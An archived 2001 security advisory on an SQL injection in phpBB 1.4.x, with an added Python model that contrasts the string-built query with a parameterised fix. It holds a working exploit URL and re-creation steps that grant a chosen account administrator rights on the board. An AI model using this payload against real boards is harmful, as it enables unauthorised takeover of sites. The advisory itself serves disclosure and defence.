[UNIX] phpBB Security Hole Leads to Root Compromise
From: support@securiteam.com  Date: 08/06/01
From: support@securiteam.com To: list@securiteam.com Subject: [UNIX] phpBB Security Hole Leads to Root Compromise Message-Id: <20010806202025.63F5E13903@mail.der-keiler.de> Date: Mon, 6 Aug 2001 22:20:25 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
phpBB Security Hole Leads to Root Compromise
------------------------------------------------------------------------
SUMMARY
<http://www.phpbb.com/> phpBB is an open source bulletin board created
by the phpBB group. phpBB does not properly sanitize input, which allows
arbitrary SQL queries to be executed and effectively grants administrative
access to the bulletin board.
DETAILS
Vulnerable systems:
phpBB version 1.4.0
phpBB version 1.4.1
The problem lies in the fact that phpBB includes code in the auth.php file
that removes the backslashes PHP automatically adds (with magic_quotes_gpc)
to GET/POST/Cookie variables.
<Example code from auth.php>
// Undo the escaping that magic_quotes_gpc added to request variables,
// so quotes reach later code (and SQL queries) unescaped.
if(get_magic_quotes_gpc() == 1)
{
    switch($REQUEST_METHOD){
        case "POST":
            while (list ($key, $val) = each ($HTTP_POST_VARS)){
                if( is_array($val) ){
                    array_walk($val, 'stripslashes_array', '');
                    $$key = $val;
                }
                else{
                    $$key = stripslashes($val);
                }
            }
            break;
        // remaining cases omitted in the advisory excerpt
    }
}
</ End example code>
As a result, certain PHP variables submitted through a URL can reach an SQL
query with unescaped quotes. One such case is in the prefs.php file, where a
user can execute an arbitrary query by supplying a crafted value for the
$viewemail variable.
< Example sql query in prefs.php >
$sql = "UPDATE users SET
        user_viewemail = '$viewemail',
        user_theme = '$themes', user_attachsig = '$sig',
        user_desmile = '$smile', user_html = '$dishtml',
        user_bbcode = '$disbbcode', user_lang = '$lang'
        WHERE (user_id = '$userdata[user_id]')";
</ End example code >
The following example URL gives the user "l337h4x0r" level 4
(administrative) privileges on the board:
<Example URL>
http://sitename/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'l337h4x0r'%23
</ End example URL>
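As an added example (not part of the advisory or of phpBB), a Python/sqlite3 model of the issue: the magic_quotes escaping is undone by the auth.php stripslashes loop, the raw value is interpolated into the prefs.php UPDATE, and parameter binding is shown as the fix. The users table, user id 7 and the reduced column list are constructed assumptions; the vulnerable statement is only built as text, not executed, because the advisory's MySQL payload uses `#` comment syntax that sqlite does not accept.

```python
import sqlite3

def magic_quotes_gpc(value: str) -> str:
    """Emulates PHP's magic_quotes_gpc=On: backslash-escape quotes in request input."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def stripslashes(value: str) -> str:
    """Emulates PHP stripslashes(), which auth.php applies to every request variable."""
    out, i = [], 0
    while i < len(value):
        if value[i] == "\\":
            i += 1                      # drop the backslash, keep what follows it
            if i >= len(value):
                break
        out.append(value[i])
        i += 1
    return "".join(out)

def build_prefs_update(viewemail: str, user_id: int) -> str:
    """Mirrors prefs.php's string-built UPDATE (other SET columns omitted)."""
    return (f"UPDATE users SET user_viewemail='{viewemail}' "
            f"WHERE (user_id = '{user_id}')")

def vulnerable_query_text(raw_viewemail: str, user_id: int) -> str:
    """Value as it travels: magic_quotes escapes it, auth.php strips it, prefs.php interpolates it."""
    return build_prefs_update(stripslashes(magic_quotes_gpc(raw_viewemail)), user_id)

def update_prefs_safe(conn: sqlite3.Connection, viewemail: str, user_id: int) -> tuple:
    """Hardened form: the value is bound as a parameter, so it can never be parsed as SQL."""
    conn.execute("UPDATE users SET user_viewemail=? WHERE user_id=?", (viewemail, user_id))
    return conn.execute("SELECT user_viewemail, user_level FROM users WHERE user_id=?",
                        (user_id,)).fetchone()

# Constructed input: the URL-decoded $viewemail value from the advisory.
PAYLOAD = "1',user_level='4' where username='l337h4x0r'#"

def demo() -> tuple:
    """Returns (text of the query prefs.php would run, row after the safe update)."""
    conn = sqlite3.connect(":memory:")   # constructed stand-in for the phpBB users table
    conn.execute("CREATE TABLE users (user_id INTEGER, username TEXT,"
                 " user_viewemail TEXT, user_level INTEGER)")
    conn.execute("INSERT INTO users VALUES (7, 'l337h4x0r', '0', 1)")
    return vulnerable_query_text(PAYLOAD, 7), update_prefs_safe(conn, PAYLOAD, 7)

if __name__ == "__main__":
    query, row = demo()
    print(query)              # the injected SET/WHERE now sits inside the statement
    print(row)                # safe path: payload stored as data, user_level still 1
```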
Re-creation:
1. Register an account on a phpBB board version 1.4.X.
2. Enter the above URL with the correct site name, replacing l337h4x0r with
your username.
3. Click on "Administration Panel" near the bottom of the page.
Solution:
An (unofficial) updated prefs.php version can be downloaded from:
<http://www.game-mods.com/prefs.php.txt>
ADDITIONAL INFORMATION
The information has been provided by kill-9 <kill-9@modernhackers.com>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.